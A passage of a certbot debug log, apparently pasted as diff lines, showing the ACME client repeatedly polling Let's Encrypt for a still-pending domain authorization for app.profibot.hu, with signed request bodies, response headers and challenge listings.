"eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICI4Mmt0SklxWXRBczdxcWtuVXNJTUxlTlpYbHNTcU1qdVJPUDVPNmdpSlFmXzdubWd1NjgiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2NoYWxsLzI5MDY0MzgxNzYvNjQ2MTU0ODYwNDA2L0Y2bTRLdyJ9", + "signature": "Ggfen2VTwEYTBv-cZiOvfxr9uj6h8e3wrdYGSkkoOyLezAYVILJSuUgG94PuFT2KnW_AqOYyfZx2ylKsxgDk8s5m6vV82lzhDTAUuMnz_y1kjhEB7r1aKkWY1Klgz5w9wsXqaH-y2_H065BNqC_kqiiSJ-_iYkg8k37VhlyzkOw0USZ-87BW1_dMgxUG6P2EaZQZSo0Gtxu9YVhR9nZ1Y__3uCQojnj1gH6SHGeXZbwhaDD4zfb_mi4O7alFKgQJXkkqIcaACWuEI-MiD4lTwAX7DR50wAreGO0bxfIiocptUtaKymFl9sD_wmc7QqRGxYI-oZUDrmCarlHAp2CbUw", + "payload": "e30" +} +2026-01-20 19:14:21,488:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/chall/2906438176/646154860406/F6m4Kw HTTP/1.1" 200 195 +2026-01-20 19:14:21,489:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Tue, 20 Jan 2026 19:14:21 GMT +Content-Type: application/json +Content-Length: 195 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index", ;rel="up" +Location: https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/646154860406/F6m4Kw +Replay-Nonce: 82ktJIqYDS2lBdKyIbD-0XQheavLC0jAxudGJHtQqth1T3t8cuw +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/646154860406/F6m4Kw", + "status": "pending", + "token": "fa3hNRmg4MuW5DiN2Jh7UIsjFyywoDpeaSC25Yh-SJ4" +} +2026-01-20 19:14:21,489:DEBUG:acme.client:Storing nonce: 82ktJIqYDS2lBdKyIbD-0XQheavLC0jAxudGJHtQqth1T3t8cuw +2026-01-20 19:14:21,489:INFO:certbot._internal.auth_handler:Waiting for verification... +2026-01-20 19:14:22,490:DEBUG:acme.client:JWS payload: +b'' +2026-01-20 19:14:22,494:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/646154860406: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICI4Mmt0SklxWURTMmxCZEt5SWJELTBYUWhlYXZMQzBqQXh1ZEdKSHRRcXRoMVQzdDhjdXciLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjQ2MTU0ODYwNDA2In0", + "signature": "jjUwIbgpGG_La30B0DTE_WxjDkmIWI_USJSgWxbR0_BEhnIUZCJSbwp9dYPJLZfEbdTren1B6sc3feiaYjBYcpFhCbSL7YkZSfGy-yFX2fJQnFfzlk_QCsI4a99Q0J7WWUnsEAo2nbyCPhanVft1LSrPXK7BlFBYnWVJHEUvmP_mjCqGRAjVMZ3qFIfGwyizd4o6LaM5N9T3f9-4n98NgdNG01TzuJ8BMpJi414BJgArgIbs3iFOhScXEKDsiSdKJ95ancyctlk454p_7AYbSn1KcA522W4SGwuhwHtDihMjBXcjhqyFFZrWrbW9YOB1WWnlsYrF3ftuE0sFu1Y2mQ", + "payload": "" +} +2026-01-20 19:14:22,650:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/646154860406 HTTP/1.1" 200 823 +2026-01-20 19:14:22,650:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Tue, 20 Jan 2026 19:14:22 GMT +Content-Type: application/json +Content-Length: 823 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: 82ktJIqYYZma0ryRRuersndhd0zRPnBzVWMhviD0macQubUTlxU +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "app.profibot.hu" + }, + "status": "pending", + "expires": "2026-01-27T19:14:21Z", + "challenges": [ + { + "type": "tls-alpn-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/646154860406/GDcGVw", + "status": "pending", + "token": "fa3hNRmg4MuW5DiN2Jh7UIsjFyywoDpeaSC25Yh-SJ4" + }, + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/646154860406/F6m4Kw", + "status": "pending", + "token": "fa3hNRmg4MuW5DiN2Jh7UIsjFyywoDpeaSC25Yh-SJ4" + }, + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/646154860406/58N6GA", + "status": "pending", + "token": "fa3hNRmg4MuW5DiN2Jh7UIsjFyywoDpeaSC25Yh-SJ4" + } + ] +} +2026-01-20 19:14:22,651:DEBUG:acme.client:Storing nonce: 82ktJIqYYZma0ryRRuersndhd0zRPnBzVWMhviD0macQubUTlxU +2026-01-20 19:14:22,651:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/646154860406/GDcGVw', 'status': 'pending', 'token': 'fa3hNRmg4MuW5DiN2Jh7UIsjFyywoDpeaSC25Yh-SJ4'} +2026-01-20 19:14:25,652:DEBUG:acme.client:JWS payload: +b'' +2026-01-20 19:14:25,655:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/646154860406: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICI4Mmt0SklxWVlabWEwcnlSUnVlcnNuZGhkMHpSUG5CelZXTWh2aUQwbWFjUXViVVRseFUiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjQ2MTU0ODYwNDA2In0", + "signature": "X6BrBFWDK_xQuwQ-dh49HbBT90FiXVWw8yeu7HIRMKsMthxp8ohrEk9Zuite38mcdHJF1vCCSp8Orc9MH4Ue0vPEBsOHW6XWvqwlme_2FfTppPNerwW55u_X84VsLXlUhkII3ovXbTD_g9JJUp7APml0_enksslg18T5eH00mPuUyUiBvZO3C-EAhv7EQ_-uvVhF32KNtMDEWDlaRHdq3j0ZD3Doof9jkNDIqQy9y5SIilgU9CdeL5SMM8ykEflzQepiuw14WeyLmavpOVSkwKDcUUJ-ZXrkDHcLiI8hgdAptrOZjDd3o7vgCGoKVxci6dKjNJss1ptFkLhGxHQRKQ", + "payload": "" +} +2026-01-20 19:14:25,811:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/646154860406 HTTP/1.1" 200 823 +2026-01-20 19:14:25,812:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Tue, 20 Jan 2026 19:14:25 GMT +Content-Type: application/json +Content-Length: 823 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: l5FKN_ymjVchkE0_JLnJpdMbdAPhS2S7fMdGzr7jjXdveLD5haA +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "app.profibot.hu" + }, + "status": "pending", + "expires": "2026-01-27T19:14:21Z", + "challenges": [ + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/646154860406/58N6GA", + "status": "pending", + "token": "fa3hNRmg4MuW5DiN2Jh7UIsjFyywoDpeaSC25Yh-SJ4" + }, + { + "type": "tls-alpn-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/646154860406/GDcGVw", + "status": "pending", + "token": "fa3hNRmg4MuW5DiN2Jh7UIsjFyywoDpeaSC25Yh-SJ4" + }, + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/646154860406/F6m4Kw", + "status": "pending", + "token": "fa3hNRmg4MuW5DiN2Jh7UIsjFyywoDpeaSC25Yh-SJ4" + } + ] +} +2026-01-20 19:14:25,813:DEBUG:acme.client:Storing nonce: l5FKN_ymjVchkE0_JLnJpdMbdAPhS2S7fMdGzr7jjXdveLD5haA +2026-01-20 19:14:25,813:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/646154860406/GDcGVw', 'status': 'pending', 'token': 'fa3hNRmg4MuW5DiN2Jh7UIsjFyywoDpeaSC25Yh-SJ4'} +2026-01-20 19:14:28,815:DEBUG:acme.client:JWS payload: +b'' +2026-01-20 19:14:28,819:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/646154860406: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJsNUZLTl95bWpWY2hrRTBfSkxuSnBkTWJkQVBoUzJTN2ZNZEd6cjdqalhkdmVMRDVoYUEiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjQ2MTU0ODYwNDA2In0", + "signature": "QcG0PBOjZeXZv2ji0VroN9-1RmhcDs95u-ceD6KFiMPGz8Lsrff-6AETMzlkRpGZwo7rDki0_aDgkFoVbCHnHGd5Tdyy_70FhGQlDVZwoIv0HlqoWwYblKjrJ9byIEg6hqgLpPNJ37cJBpGYkn0SdOIch-slaxUus6MTvFWTiBSSbSy7FkvTp3V_MW8MUatQewKoWcVSoGk5TyZ8u3G6UVD_MyWdXFJyRjj8Jywxt2GdwO2hjQiBNihEZqLsfiy5gn3MnW3r5sFmVGHgwXsF6VQ5vuKQgo8YpQj-5lZ-6xXIMzB-Q4i6wzhtk8d8WtceYloT4AyvZDMLAeldm6kAZg", + "payload": "" +} +2026-01-20 19:14:28,975:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/646154860406 HTTP/1.1" 200 823 +2026-01-20 19:14:28,976:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Tue, 20 Jan 2026 19:14:28 GMT +Content-Type: application/json +Content-Length: 823 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: l5FKN_ymnuVSJM7JGfNcCuOVONt7MpNc6C3KAD-fZBDBOStLXVs +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "app.profibot.hu" + }, + "status": "pending", + "expires": "2026-01-27T19:14:21Z", + "challenges": [ + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/646154860406/58N6GA", + "status": "pending", + "token": "fa3hNRmg4MuW5DiN2Jh7UIsjFyywoDpeaSC25Yh-SJ4" + }, + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/646154860406/F6m4Kw", + "status": "pending", + "token": "fa3hNRmg4MuW5DiN2Jh7UIsjFyywoDpeaSC25Yh-SJ4" + }, + { + "type": "tls-alpn-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/646154860406/GDcGVw", + "status": "pending", + "token": "fa3hNRmg4MuW5DiN2Jh7UIsjFyywoDpeaSC25Yh-SJ4" + } + ] +} +2026-01-20 19:14:28,977:DEBUG:acme.client:Storing nonce: l5FKN_ymnuVSJM7JGfNcCuOVONt7MpNc6C3KAD-fZBDBOStLXVs +2026-01-20 19:14:28,977:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/646154860406/GDcGVw', 'status': 'pending', 'token': 'fa3hNRmg4MuW5DiN2Jh7UIsjFyywoDpeaSC25Yh-SJ4'} +2026-01-20 19:14:31,978:DEBUG:acme.client:JWS payload: +b'' +2026-01-20 19:14:31,982:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/646154860406: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJsNUZLTl95bW51VlNKTTdKR2ZOY0N1T1ZPTnQ3TXBOYzZDM0tBRC1mWkJEQk9TdExYVnMiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjQ2MTU0ODYwNDA2In0", + "signature": "h7N47vG1R8VyJWgQPgnWEAnahrQnlaIwxYdaJ0vbuXY5AnFnGuQi_DkpvmxSG7CwTR8sBelrTlZRRfUQlKsC6IvEIVxuqKAPIQxu4HGC271yljtS-fFr8ciQLWa1-GcvaMjoNZWp_eVgVNBIOWTNRS0UBiS8gB8uHZkVzrAwEHOovsH3YLvN7pYqO6BmGdLZLjk1bBZdJo8ShWKvIHBHiLrp4e8Sz38HBUV08nQ2DSPHg4VFeHGD-ypa-5tiXDvWGQs54o5i3yvSj8Y28IVSNC1hbQoGq99d5ogOT2vsHG4zz0ul8m8bcOcmQwAMXKsPCcmhqBcNk6JU3BloCb8kmg", + "payload": "" +} +2026-01-20 19:14:32,137:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/646154860406 HTTP/1.1" 200 823 +2026-01-20 19:14:32,138:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Tue, 20 Jan 2026 19:14:32 GMT +Content-Type: application/json +Content-Length: 823 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: 82ktJIqYHTXyEDfwxHZIaPW3FcMzsQUqLYHaPLw5eNbZsMT12qw +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "app.profibot.hu" + }, + "status": "pending", + "expires": "2026-01-27T19:14:21Z", + "challenges": [ + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/646154860406/58N6GA", + "status": "pending", + "token": "fa3hNRmg4MuW5DiN2Jh7UIsjFyywoDpeaSC25Yh-SJ4" + }, + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/646154860406/F6m4Kw", + "status": "pending", + "token": "fa3hNRmg4MuW5DiN2Jh7UIsjFyywoDpeaSC25Yh-SJ4" + }, + { + "type": "tls-alpn-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/646154860406/GDcGVw", + "status": "pending", + "token": "fa3hNRmg4MuW5DiN2Jh7UIsjFyywoDpeaSC25Yh-SJ4" + } + ] +} +2026-01-20 19:14:32,139:DEBUG:acme.client:Storing nonce: 82ktJIqYHTXyEDfwxHZIaPW3FcMzsQUqLYHaPLw5eNbZsMT12qw +2026-01-20 19:14:32,139:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/646154860406/GDcGVw', 'status': 'pending', 'token': 'fa3hNRmg4MuW5DiN2Jh7UIsjFyywoDpeaSC25Yh-SJ4'} +2026-01-20 19:14:35,140:DEBUG:acme.client:JWS payload: +b'' +2026-01-20 19:14:35,144:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/646154860406: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICI4Mmt0SklxWUhUWHlFRGZ3eEhaSWFQVzNGY016c1FVcUxZSGFQTHc1ZU5iWnNNVDEycXciLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjQ2MTU0ODYwNDA2In0", + "signature": "IwDO8jcNl_pKRovEko0_w-bggjTQ301uW7-fFBqIpB5dSE5F8gZN_1H276Npja488HOgYzCFlF6364FEpzPC4lJZFk6UeuzFJIKmXg-nZDxJUyFSSFtLKzse9Qrz_5Q4FYOpL6gdhNFh6zXkYNyNcX_qZi5Q2HuuI855YcX4nf4TlCbj1t1mp2Mm35TUlmGxbFHJu91jWYymsYi1boE3buwXG0Vq4XNOzNq1deR4FGX1Cz4vdB-hB-aHGUcVZ1rqjwmQE-jMhEpYHzjo2zQsXcDw2n-kwElL295E0Paotbe7slwrrHUe6ptl8VUn63-AlCXEMgjGMX2fw2pKKwXq4A", + "payload": "" +} +2026-01-20 19:14:35,300:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/646154860406 HTTP/1.1" 200 823 +2026-01-20 19:14:35,301:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Tue, 20 Jan 2026 19:14:35 GMT +Content-Type: application/json +Content-Length: 823 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: 82ktJIqYOKQmf5Pq8dXx5g6BJ772YTEIfKnAt1eDVt4Zq1gbbEc +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "app.profibot.hu" + }, + "status": "pending", + "expires": "2026-01-27T19:14:21Z", + "challenges": [ + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/646154860406/58N6GA", + "status": "pending", + "token": "fa3hNRmg4MuW5DiN2Jh7UIsjFyywoDpeaSC25Yh-SJ4" + }, + { + "type": "tls-alpn-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/646154860406/GDcGVw", + "status": "pending", + "token": "fa3hNRmg4MuW5DiN2Jh7UIsjFyywoDpeaSC25Yh-SJ4" + }, + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/646154860406/F6m4Kw", + "status": "pending", + "token": "fa3hNRmg4MuW5DiN2Jh7UIsjFyywoDpeaSC25Yh-SJ4" + } + ] +} +2026-01-20 19:14:35,301:DEBUG:acme.client:Storing nonce: 82ktJIqYOKQmf5Pq8dXx5g6BJ772YTEIfKnAt1eDVt4Zq1gbbEc +2026-01-20 19:14:35,301:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/646154860406/GDcGVw', 'status': 'pending', 'token': 'fa3hNRmg4MuW5DiN2Jh7UIsjFyywoDpeaSC25Yh-SJ4'} +2026-01-20 19:14:38,303:DEBUG:acme.client:JWS payload: +b'' +2026-01-20 19:14:38,306:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/646154860406: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICI4Mmt0SklxWU9LUW1mNVBxOGRYeDVnNkJKNzcyWVRFSWZLbkF0MWVEVnQ0WnExZ2JiRWMiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjQ2MTU0ODYwNDA2In0", + "signature": "JX4YgtHUWcB9NBMaXPEnDw6juD4-4MybH9Tiy-tUs5E1sE10e4AwblfQe-x59IDy7cTnFOXoBgD1xxbxS4DcPGLQQZI1rtlBO1LzEo1dnSE2Yp5d4jqCe7AA6_c3O3juqqKuI9MDp8NN3oYGjodElkOTmJAZry4MTqI1UFZpsUZEIajk8JkvA4rz18FNaF6nFnUv1oJerXvh-93WTjpu5ScGuCK_PGI6Zg0yg1wxuZ6Ao5uVr2OUDkG8fgXIqhpJ0VrZPSvzpGGfjd3PZBZ6B49XuKuKuKPLTOYxPGS_Awm816pnNsu6rPUGBNXzYl1G0ctEPV-KvWgoT9JlPuxAGw", + "payload": "" +} +2026-01-20 19:14:38,462:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/646154860406 HTTP/1.1" 200 823 +2026-01-20 19:14:38,463:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Tue, 20 Jan 2026 19:14:38 GMT +Content-Type: application/json +Content-Length: 823 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: l5FKN_ymxHQhBJvoU32e_MPC4uoseGepktPiH1RKfHmWFdNQHfw +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "app.profibot.hu" + }, + "status": "pending", + "expires": "2026-01-27T19:14:21Z", + "challenges": [ + { + "type": "tls-alpn-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/646154860406/GDcGVw", + "status": "pending", + "token": "fa3hNRmg4MuW5DiN2Jh7UIsjFyywoDpeaSC25Yh-SJ4" + }, + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/646154860406/58N6GA", + "status": "pending", + "token": "fa3hNRmg4MuW5DiN2Jh7UIsjFyywoDpeaSC25Yh-SJ4" + }, + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/646154860406/F6m4Kw", + "status": "pending", + "token": "fa3hNRmg4MuW5DiN2Jh7UIsjFyywoDpeaSC25Yh-SJ4" + } + ] +} +2026-01-20 19:14:38,464:DEBUG:acme.client:Storing nonce: l5FKN_ymxHQhBJvoU32e_MPC4uoseGepktPiH1RKfHmWFdNQHfw +2026-01-20 19:14:38,464:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/646154860406/GDcGVw', 'status': 'pending', 'token': 'fa3hNRmg4MuW5DiN2Jh7UIsjFyywoDpeaSC25Yh-SJ4'} +2026-01-20 19:14:41,465:DEBUG:acme.client:JWS payload: +b'' +2026-01-20 19:14:41,469:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/646154860406: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJsNUZLTl95bXhIUWhCSnZvVTMyZV9NUEM0dW9zZUdlcGt0UGlIMVJLZkhtV0ZkTlFIZnciLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjQ2MTU0ODYwNDA2In0", + "signature": "JUgN0NlI-n_eWhpX8sZX9QWipBzKnD6VjCcDrwQWEV6eFiaw3otlgEQMQ5_pEbUJCfso7y4DPQlPgAVv4TkbCjSH1paWD4-3QnmnDL-4eJmxEAQr7mQZ2a85-JQigrI0ZN9SS28iTBxzgD8Lj0P4VPMJvjlxqcfleZ4Zr39L24hPolRuKFH3Q9u5OnJeM7YZus_xACCUHcLZYschX2vCaW4NqOBHqHgXe4UubU1jWfh9q_RdZ-saCYcdGyHSbpQL3mLMkRknPljho3pmKYvz_Lt6sDJWZ38PEbVLwzYHc88EycDClViM_rV0KkQVfcL2EC6T33hq4fADIvoDKVLpUw", + "payload": "" +} +2026-01-20 19:14:41,627:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/646154860406 HTTP/1.1" 200 823 +2026-01-20 19:14:41,628:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Tue, 20 Jan 2026 19:14:41 GMT +Content-Type: application/json +Content-Length: 823 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: l5FKN_ymBHTKlFoH3l--jkweBmzWjlG9txDYX_PtpLTavbI4e2k +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "app.profibot.hu" + }, + "status": "pending", + "expires": "2026-01-27T19:14:21Z", + "challenges": [ + { + "type": "tls-alpn-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/646154860406/GDcGVw", + "status": "pending", + "token": "fa3hNRmg4MuW5DiN2Jh7UIsjFyywoDpeaSC25Yh-SJ4" + }, + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/646154860406/58N6GA", + "status": "pending", + "token": "fa3hNRmg4MuW5DiN2Jh7UIsjFyywoDpeaSC25Yh-SJ4" + }, + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/646154860406/F6m4Kw", + "status": "pending", + "token": "fa3hNRmg4MuW5DiN2Jh7UIsjFyywoDpeaSC25Yh-SJ4" + } + ] +} +2026-01-20 19:14:41,628:DEBUG:acme.client:Storing nonce: l5FKN_ymBHTKlFoH3l--jkweBmzWjlG9txDYX_PtpLTavbI4e2k +2026-01-20 19:14:41,629:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/646154860406/GDcGVw', 'status': 'pending', 'token': 'fa3hNRmg4MuW5DiN2Jh7UIsjFyywoDpeaSC25Yh-SJ4'} +2026-01-20 19:14:44,630:DEBUG:acme.client:JWS payload: +b'' +2026-01-20 19:14:44,632:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/646154860406: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJsNUZLTl95bUJIVEtsRm9IM2wtLWprd2VCbXpXamxHOXR4RFlYX1B0cExUYXZiSTRlMmsiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjQ2MTU0ODYwNDA2In0", + "signature": "HoEmTS0AdOgDTh5RQHENpLOSILzwQIVNVC8j7PlOo3jWT-X_m5WwN6G81Iw36RqH2YMRyXOPogCSXaLjdrQtXap9eX_BN6-dWkDp_FcnQjkJzIcYXd3hTUY15R6Z-rkErBFnzfRdx877yTajysYzhrXzwh6Kem0YxLJPnkdZKsLNPt9P7ZPYe-oM3qHkXG557ITui_p9l38srcujY2mIyFLUEZ0RV3GiV41qtSmp-uPsStOa9Vk5v1VjjmEXrJJ7j5wQcVV7wQEGrRycgaDWYcegijs3ctbmE4B-96-rG7qhI6geWvQxlwlzD1TLW0mUAnc4RI3I7YzhjyfwlpqdZA", + "payload": "" +} +2026-01-20 19:14:44,787:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/646154860406 HTTP/1.1" 200 823 +2026-01-20 19:14:44,788:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Tue, 20 Jan 2026 19:14:44 GMT +Content-Type: application/json +Content-Length: 823 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: 82ktJIqYLhR4ETijKbmi7a_xx1V7NR1RtcareEIXVpqraZCdn_E +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "app.profibot.hu" + }, + "status": "pending", + "expires": "2026-01-27T19:14:21Z", + "challenges": [ + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/646154860406/F6m4Kw", + "status": "pending", + "token": "fa3hNRmg4MuW5DiN2Jh7UIsjFyywoDpeaSC25Yh-SJ4" + }, + { + "type": "tls-alpn-01", + "url": 